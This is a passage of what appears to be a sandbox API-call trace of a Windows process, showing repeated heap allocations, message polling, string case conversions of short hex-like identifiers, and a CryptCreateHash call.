0x2a72a38 [0086.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0086.521] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.521] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.521] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.521] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a778f0 [0086.521] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0086.521] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0086.522] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0086.522] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0086.522] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.522] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.522] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.522] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0086.522] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0086.522] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0086.522] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0086.522] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0086.522] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.522] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0086.523] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0086.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0086.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0086.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0086.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0086.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0086.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0086.523] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0086.523] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.523] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0086.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0086.524] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0086.524] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.524] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0086.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0086.524] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0086.524] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0086.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0086.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0086.524] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0086.524] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0086.524] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0086.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0086.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0086.524] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.524] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0086.524] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0086.525] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0086.525] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.525] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0086.525] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0086.525] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0086.525] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0086.525] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.525] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0086.525] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0086.525] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0086.525] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0086.526] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0086.526] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.526] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0086.526] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0086.526] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0086.526] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0086.526] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.526] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0086.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0086.527] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0086.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0086.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0086.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0086.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0086.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0086.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9f28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0086.528] CryptCreateHash (in: hProv=0x9961a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0086.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0086.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0086.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0086.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0086.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0086.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0086.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0086.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0086.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0086.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0086.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0086.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0086.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0086.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0086.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0086.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0086.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0086.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0086.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0086.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0086.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0086.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0086.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0086.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0086.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0086.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0086.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0086.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0086.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0086.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0086.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0086.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0086.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0086.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0086.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: 